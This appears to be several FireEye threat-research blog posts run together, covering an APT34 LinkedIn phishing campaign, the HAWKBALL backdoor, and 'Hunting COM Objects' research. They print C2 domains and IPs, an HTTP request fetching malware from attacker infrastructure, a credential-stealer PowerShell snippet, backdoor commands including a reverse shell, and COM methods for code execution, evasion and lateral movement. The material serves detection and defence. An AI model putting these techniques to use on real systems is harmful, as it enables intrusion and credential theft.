Windows 10 memory compression is a significant evolution in the design of the memory manager that increases system performance by making a more efficient use of physical memory. This increase in performance comes at the cost of a more complex memory management system that is currently not publicly documented. Up until now, Volatility and Rekall were unable to inspect memory stored in compressed pages, opening the door to malicious programs and forensics artifacts going undetected. FireEye’s FLARE team hopes to fill the knowledge and technical gaps for Windows 10 compressed memory through contributions to Volatility and Rekall, as well as in presentations given at SANS DIFR (Finding Evil in Windows 10 Compressed Memory) and BlackHat USA 2019. We look forward to seeing you there and hearing your feedback, and we’re excited to see how these frameworks develop as a result of our contributions! Stay tuned for Part Two of our Finding Evil in Windows 10 Compressed Memory blog series.

Hard Pass: Declining APT34’s Invite to Join Their Professional Network

Background

With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.

FireEye Identifies Phishing Campaign

In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:

  1. Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,
  2. The usage of LinkedIn to deliver malicious documents,
  3. The addition of three new malware families to APT34’s arsenal.

FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.

APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.

Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.

Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include APT33, which is mentioned in this updated FireEye blog post.

Industries Targeted

The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:

  • Energy and Utilities
  • Government
  • Oil and Gas

Utilizing Cambridge University to Establish Trust

On June 19, 2019, FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.

The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.

A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.

Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls originated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.

Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.


Figure 1: Screenshot of LinkedIn message asking to download TONEDEAF

This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.

FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:

  • 96feed478c347d4b95a8224de26a1b2c
  • caf418cbf6a9c4e93e79d4714d5d3b87

A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.


Figure 2: Screenshot of VBA code from System.doc

The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.


Figure 3: Additional VBA code from System.doc

Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.

The FireEye Footprint: Pivots and Victim Identification

After identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.

Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:

  • hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Window’s temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.

FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).

GET hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)
AppleWebKit/537.36 (KHTML, like Gecko)
Host: offlineearthquake[.]com
Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1

Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance

FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.

VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.

Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.

PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.

Conclusion

The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.

We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.

Malware Appendix

TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality. Figure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a means for future DNS exfiltration as a plan B.


Figure 5: Snippet of code from TONEDEAF binary

Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.

VALUEVAULT

VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.

powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials

Upon execution, VALUEVAULT creates a SQLITE database file in the AppData\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.


Figure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database

VALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other developer environment variables were directly available within the binary as shown below. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.

C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/mozila.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/main.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/ie.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

Figure 8: Golang files extracted during execution of VALUEVAULT

LONGWATCH

FireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

Interesting strings identified in the binary are shown in Figure 9.

GetAsyncKeyState
>---------------------------------------------------\n\n
c:\\windows\\temp\\log.txt
[ENTER]
[CapsLock]
[CRTL]
[PAGE_UP]
[PAGE_DOWN]
[HOME]
[LEFT]
[RIGHT]
[DOWN]
[PRINT]
[PRINT SCREEN] (1 space)
[INSERT]
[SLEEP]
[PAUSE]
\n---------------CLIPBOARD------------\n
\n\n >>>  (2 spaces)
c:\\windows\\temp\\log.txt

Figure 9: Strings identified in a LONGWATCH binary

Detecting the Techniques

FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 2 contains several specific detection names that provide an indication of APT34 activity.

Signature Name

FE_APT_Keylogger_Win_LONGWATCH_1

FE_APT_Keylogger_Win_LONGWATCH_2

FE_APT_Keylogger_Win32_LONGWATCH_1

FE_APT_HackTool_Win_PICKPOCKET_1

FE_APT_Trojan_Win32_VALUEVAULT_1

FE_APT_Backdoor_Win32_TONEDEAF

TONEDEAF BACKDOOR [DNS]

TONEDEAF BACKDOOR [upload]

TONEDEAF BACKDOOR [URI]

Table 1: FireEye Platform Detections

Endpoint Indicators

Indicator

MD5 Hash (if applicable)

Code Family

System.doc

b338baa673ac007d7af54075ea69660b

TONEDEAF

 

50fb09d53c856dcd0782e1470eaeae35

TONEDEAF

ERFT-Details.xls

96feed478c347d4b95a8224de26a1b2c

TONEDEAF DROPPER

 

caf418cbf6a9c4e93e79d4714d5d3b87

TONEDEAF DROPPER

b.exe

9fff498b78d9498b33e08b892148135f

VALUEVAULT

WindowsNTProgram.exe

021a0f57fe09116a43c27e5133a57a0a

LONGWATCH

PE86.dll

d8abe843db508048b4d4db748f92a103

PICKPOCKET

PE64.dll

6eca9c2b7cf12c247032aae28419319e

PICKPOCKET

Table 2: APT34 Endpoint Indicators from this blog post

Network Indicators

hxxp[://]www[.]cam-research-ac[.]com

offlineearthquake[.]com

c[.]cdn-edge-akamai[.]com

185[.]15[.]247[.]154

Acknowledgements

A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.

Hunting COM Objects (Part Two)

Background

As a follow up to Part One in this blog series on COM object hunting, this post will talk about taking the COM object hunting methodology deeper by looking at interesting COM object methods exposed in properties and sub-properties of COM objects.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

A COM object’s services can be consumed from almost any language by multiple processes, or even remotely. COM objects are usually obtained by specifying a CLSID (an identifying GUID) or ProgID (programmatic identifier). These COM objects are published in the Windows registry and can be extracted easily, as described below.

COM Object Enumeration

FireEye performed research into COM objects on Windows 10 and Windows 7, along with COM objects in Microsoft Office. Part One of this blog series described a technique for enumerating all COM objects on the system, instantiating them, and searching for interesting properties and methods. However, this only scratches the surface of what is accessible through these COM objects, as each object may return other objects that cannot be directly created on their own.

The change introduced here recursively searches for COM objects, which are only exposed through member methods and properties of each enumerated COM object. The original methodology looked at interesting methods exposed directly by each object and didn’t recurse into any properties that may also be COM objects with their own interesting methods. This improvement to the methodology assisted in the discovery of a new COM object that can be used for code execution, and new ways to call publicly known code execution COM object methods.

Recursive COM Object Method Discovery

A common theme among publicly discovered techniques for code execution using COM objects is that they take advantage of a method that is exposed within a child property of the COM object. An example of this is the “MMC20.Application” COM object. To achieve code execution with this COM object, you need to use the “ExecuteShellCommand” method on the View object returned by the “Document.ActiveView” property, as discovered by Matt Nelson in this blog post. In Figure 1 you can see how this method is only discoverable within the object returned by “Document.ActiveView”, and is not directly exposed by the MMC20.Application COM object.


Figure 1: Listing ExecuteShellCommand method in MMC20.Application COM object

Another example of this is the “ShellBrowserWindow” COM object, which was also first written about by Matt Nelson in this blog post. As you can see in Figure 2, the “ShellExecute” method is not directly exposed in the COM object. However, the “Document.Application” property returns an instance of the Shell object, which exposes the ShellExecute method.


Figure 2: Listing ExecuteShellCommand method in ShellBrowserWindow COM object

As evidence of the previous two examples, it is important to not only look at methods exposed directly by the COM object, but also recursively look for objects with interesting methods exposed as properties of COM objects. This example also illustrates why simply statically exploring the Type Libraries of the COM objects may not be sufficient. The relevant functions are only accessed after dynamically enumerating objects of the generic type IDispatch. This recursive methodology can enable finding new COM objects to be used for code execution, and different ways to use publicly known COM objects that can be used for code execution.

An example of how this recursive methodology found a new way to call a publicly known COM object method is the “ShellExecute” method in the “ShellBrowserWindow” COM object that was shown previously in this article. The previously publicly known way of calling this method within the “ShellBrowserWindow” COM object is using the “Document.Application” property. The recursive COM object method discovery also found that you can call the “ShellExecute” method on the object returned by the “Document.Application.Parent” property as seen in Figure 3. This can be useful from an evasion standpoint.


Figure 3: Alternative way to call ShellExecute with ShellBrowserWindow COM object

Command Execution

Using this recursive COM object method discovery, FireEye was able to find a COM object with the ProgID “Excel.ChartApplication” that can be used for code execution using the DDEInitiate method. This DDEInitiate method of launching executables was first abused in the “Excel.Application” COM object as seen in this article by Cybereason. There are multiple properties in the “Excel.ChartApplication” COM object that return objects that can be used to execute the DDEInitiate method as seen in Figure 4. Although this DDEInitiate method is also exposed directly by the COM object, it was initially discovered when looking at methods exposed in the other objects accessible from this object.


Figure 4: Different ways to call DDEInitiate with Excel.ChartApplication COM object

This COM object can also be instantiated and used remotely for Office 2013 as seen in Figure 5. The COM object can only be instantiated locally on Office 2016. When trying to instantiate it remotely against Office 2016, an error code will return indicating that the COM object class is not registered for remote instantiation.


Figure 5: Using Excel.ChartApplication remotely against Office 2013

Conclusion

The recursive searching of COM object methods can lead to the discovery of new COM objects that can be used for code execution, and new ways to call publicly known COM object methods. These COM object methods can be used to subvert different detection patterns and can also be used for lateral movement.

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.


Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.


Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).


Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines if the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry> using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4          0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).


Figure 4: String format for log file

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.


Figure 5: Config decryption routine

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string config/systemprofile.


Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).


Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:

  • Content-Length: <content_length>
  • Cache-Control: no-cache
  • Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.


Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"


Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

Value

Information

T

Initially set to 0

S

Initially set to 0

P

String from decrypted config at 0x68

k

The result of GetTickCount()

Table 1: GET request parameters

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"


Figure 10: Second GET request


Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

Value

Information

E

Initially Set to 0

T

Initially set to 0

K

The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.


Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

Command

Operation Performed

0

Set URI query string to value

16

Unknown

17

Collect system information

18

Execute a provided argument using CreateProcess

19

Execute a provided argument using CreateProcess and upload output

20

Create a cmd.exe reverse shell, execute a command, and upload output

21

Shut down reverse shell

22

Unknown

23

Shut down reverse shell

48

Download file

64

Get drive geometry and free space for logical drives C-Z

65

Retrieve information about provided directory

66

Delete file

67

Move file

Table 3: HAWKBALL commands

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

  • Computer Name
  • User Name
  • IP Address
  • Active Code Page
  • OEM Page
  • OS Version
  • Architecture Details (x32/x64)
  • String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

  • GetComputerNameA
  • GetUserNameA
  • Gethostbyname and inet_ntoa
  • GetACP
  • GetOEMPC
  • GetCurrentProcess and IsWow64Process


Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.


Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

Parameter

Information

E

Initially set to 0

T

Decimal form of the little-endian XOR key

K

The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.


Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 show the operation.


Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

  • FindFirstFileW
  • FindNextFileW
  • FileTimeToLocalFileTime
  • FiletimeToSystemTime

Figure 17 shows the API used for collecting information.


Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.


Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.


Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

  • Passing value 0x7 to ProcessInformationClass:


Figure 20: ProcessDebugPort verification

  • Passing value 0x1E to ProcessInformationClass:


Figure 21: ProcessDebugFlags verification

  • Passing value 0x1F to ProcessInformationClass:


Figure 22: ProcessDebugObject

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

MD5

Name

AC0EAC22CE12EAC9EE15CA03646ED70C

Doc.rtf

D90E45FBF11B5BBDCA945B24D155A4B2

hh14980443.wll

Network Indicators

  • 149.28.182[.]78:443
  • 149.28.182[.]78:80
  • http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
  • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

MD5

Product

Signature

Action

AC0EAC22CE12EAC9EE15CA03646ED70C

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

FE_Exploit_RTF_EQGEN_7

Exploit.Generic.MVX

Block

D90E45FBF11B5BBDCA945B24D155A4B2

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

Malware.Binary.Dll

FE_APT_Backdoor_Win32_HawkBall_1

APT.Backdoor.Win.HawkBall

Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Hunting COM Objects

COM objects have recently been used by penetration testers, Red Teams, and malicious actors to perform lateral movement. COM objects were studied by several other researchers in the past, including Matt Nelson (enigma0x3), who published a blog post about it in 2017. Some of these COM objects were also added to the Empire project. To improve the Red Team practice, FireEye performed research into the available COM objects on Windows 7 and 10 operating systems. Several interesting COM objects were discovered that allow task scheduling, fileless download & execute as well as command execution. Although not security vulnerabilities on their own, usage of these objects can be used to defeat detection based on process behavior and heuristic signatures.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

COM was created in the 1990’s as language-independent binary interoperability standard which enables separate code modules to interact with each other. This can occur within a single process or cross-process, and Distributed COM (DCOM) adds serialization allowing Remote Procedure Calls across the network.

The term “COM Object” refers to an executable code section which implements one or more interfaces deriving from IUnknown.  IUnknown is an interface with 3 methods, which support object lifetime reference counting and discovery of additional interfaces.  Every COM object is identified by a unique binary identifier. These 128 bit (16 byte) globally unique identifiers are generically referred to as GUIDs.  When a GUID is used to identify a COM object, it is a CLSID (class identifier), and when it is used to identify an Interface it is an IID (interface identifier). Some CLSIDs also have human-readable text equivalents called a ProgID.

Since COM is a binary interoperability standard, COM objects are designed to be implemented and consumed from different languages.  Although they are typically instantiated in the address space of the calling process, there is support for running them out-of-process with inter-process communication proxying the invocation, and even remotely from machine to machine.

The Windows Registry contains a set of keys which enable the system to map a CLSID to the underlying code implementation (in a DLL or EXE) and thus create the object.

Methodology

The registry key HKEY_CLASSES_ROOT\CLSID exposes all the information needed to enumerate COM objects, including the CLSID and ProgID. The CLSID is a globally unique identifier associated with a COM class object. The ProgID is a programmer-friendly string representing an underlying CLSID.

The list of CLSIDs can be obtained using the following Powershell commands in Figure 1.

New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > clsids.txt

Figure 1: Enumerating CLSIDs under HKCR

The output will resemble Figure 2.

{0000002F-0000-0000-C000-000000000046}
{00000300-0000-0000-C000-000000000046}
{00000301-A8F2-4877-BA0A-FD2B6645FB94}
{00000303-0000-0000-C000-000000000046}
{00000304-0000-0000-C000-000000000046}
{00000305-0000-0000-C000-000000000046}
{00000306-0000-0000-C000-000000000046}
{00000308-0000-0000-C000-000000000046}
{00000309-0000-0000-C000-000000000046}
{0000030B-0000-0000-C000-000000000046}
{00000315-0000-0000-C000-000000000046}
{00000316-0000-0000-C000-000000000046}

Figure 2:Abbreviated list of CLSIDs from HKCR

We can use the list of CLSIDs to instantiate each object in turn, and then enumerate the methods and properties exposed by each COM object. PowerShell exposes the Get-Member cmdlet that can be used to list methods and properties on an object easily. Figure 3 shows a PowerShell script to enumerate this information. Where possible in this study, standard user privileges were used to provide insight into available COM objects under the worst-case scenario of having no administrative privileges.

$Position  = 1
$Filename = "win10-clsid-members.txt"
$inputFilename = "clsids.txt"
ForEach($CLSID in Get-Content $inputFilename) {
      Write-Output "$($Position) - $($CLSID)"
      Write-Output "------------------------" | Out-File $Filename -Append
      Write-Output $($CLSID) | Out-File $Filename -Append
      $handle = [activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
      $handle | Get-Member | Out-File $Filename -Append
      $Position += 1
}

Figure 3: PowerShell scriptlet used to enumerate available methods and properties

If you run this script, expect some interesting side-effect behavior such as arbitrary applications being launched, system freezes, or script hangs. Most of these issues can be resolved by closing the applications that were launched or by killing the processes that were spawned.

Armed with a list of all the CLSIDs and the methods and properties they expose, we can begin the hunt for interesting COM objects. Most COM servers (code implementing a COM object) are implemented in a DLL whose path is stored in the registry key e.g. under InprocServer32. This is useful because reverse engineering may be required to understand undocumented COM objects.

On Windows 7, a total of 8,282 COM objects were enumerated. Windows 10 featured 3,250 new COM objects in addition to those present on Windows 7. Non-Microsoft COM objects were generally omitted because they cannot be reliably expected to be present on target machines, which limits their usefulness to Red Team operations. Selected Microsoft COM objects from the Windows SDK were included in the study for purposes of targeting developer machines.

Once the members were obtained, a keyword-based search approach was used to quickly yield results. For the purposes of this research, the following keywords were used: execute, exec, spawn, launch, and run.

One example was the {F1CA3CE9-57E0-4862-B35F-C55328F05F1C} COM object (WatWeb.WatWebObject) on Windows 7. This COM object exposed a method named LaunchSystemApplication as shown in Figure 4.


Figure 4: WatWeb.WatWebObject methods including the interesting LaunchSystemApplication method

